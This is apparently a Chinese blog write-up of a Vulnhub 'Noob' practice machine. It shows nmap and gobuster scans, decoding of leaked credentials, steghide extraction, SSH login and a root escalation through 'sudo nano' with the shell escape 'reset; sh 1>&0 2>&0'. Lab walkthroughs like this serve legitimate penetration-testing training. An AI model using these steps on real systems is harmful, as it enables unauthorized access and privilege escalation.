Vulnhub Noob靶机复现(附提权)

一、安装靶机

下载地址:https://download.vulnhub.com/noob/Noob.ova

下载好后使用VM打开配置如下。

二、主机发现

使用nmap扫描确认靶机ip(192.168.29.138)

复制代码
nmap -sn 192.168.29.1/24

三、端口扫描

使用nmap工具扫描全部端口以防遗漏。

复制代码
nmap -A -p- 192.168.29.138

四、目录探测

使用kali里最全的大字典去扫描。扫描出来后进行访问,查看有哪些网页目录可以利用(不要网了敏感目录)。

复制代码
gobuster dir -u http://192.168.29.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web渗透/提权

端口扫描的时候知道我们的靶机开启了21端口ftp服务,而且里面有两个文件,下载下来看看。

cred里面的东西解码看一下是一个账号密码,应该是登录用的,welcome没啥用。

复制代码
Y2hhbXA6cGFzc3dvcmQ=

champ:password

点击About Us会下载一个压缩包,打开后就只有这些东西。图片应该还会有东西,使用工具提取一下,看看里面有什么我们没有注意到的。

bmp文件内存在隐写,查看内容。

复制代码
apt install steghide

steghide extract -sf funny.bmp
steghide info funny.jpg

cat user.txt
cat hint.py

将user.txt文件里的数据根据py文件的提示解密(rot加密)。或许是没有用到的55077端口ssh的账户密码

复制代码
wtf:this one is a simple one

还有一个55077端口的ssh服务,连接一下看看。

复制代码
ssh wtf@192.168.29.138 -p 55077

在目录下找出flag和backup文件里的另一个账户密码。

flag解码后没有啥用,切换到另一个用户里面。

查看可以使用root权限的文件

复制代码
sudo -l

执行下列命令提权

复制代码
sudo nano

Ctrl+r ,Ctrl+x

reset; sh 1>&0 2>&0

完结撒花✿✿ヽ(°▽°)ノ✿

相关推荐
胡西风_foxww1 天前
Vue2 项目实现 Gzip 压缩全攻略:从配置到部署避坑指南
nginx·部署·vue2·配置·gzip·压缩·攻略
正经教主2 天前
【n8n】如何跟着AI学习n8n【03】:HTTPRequest节点、Webhook节点、SMTP节点、mysql节点
人工智能·学习·教程·工作流·n8n
哈市雪花3 天前
添加捕捉吸附标识(使用QT+OpenGL开发三维CAD)
qt·教程·opengl·cad·绘制·工业软件·捕捉吸附
正经教主3 天前
【n8n】如何跟着AI学习n8n【02.5】:第一部分总练习
人工智能·学习·教程·n8n
爱分享的飘哥4 天前
第三篇:VAE架构详解与PyTorch实现:从零构建AI的“视觉压缩引擎”
人工智能·pytorch·python·aigc·教程·生成模型·代码实战
钱彬 (Qian Bin)7 天前
《使用Qt Quick从零构建AI螺丝瑕疵检测系统》——6. 传统算法实战:用OpenCV测量螺丝尺寸
教程·cmake·qml·qt quick·工业软件·工业瑕疵检测·qt6.9.1
NPE~7 天前
基于MySQL实现基础图数据库
数据库·sql·mysql·教程·图数据库·图结构
haonuy*9 天前
Log4j CVE-2021-44228 漏洞复现详细教程
log4j·教程·漏洞复现·cve-2021-44228
钱彬 (Qian Bin)9 天前
《使用Qt Quick从零构建AI螺丝瑕疵检测系统》——4. 前后端联动:打通QML与C++的任督二脉
c++·qt·教程·qml·qt quick·qt 6.9.1·工业瑕疵检测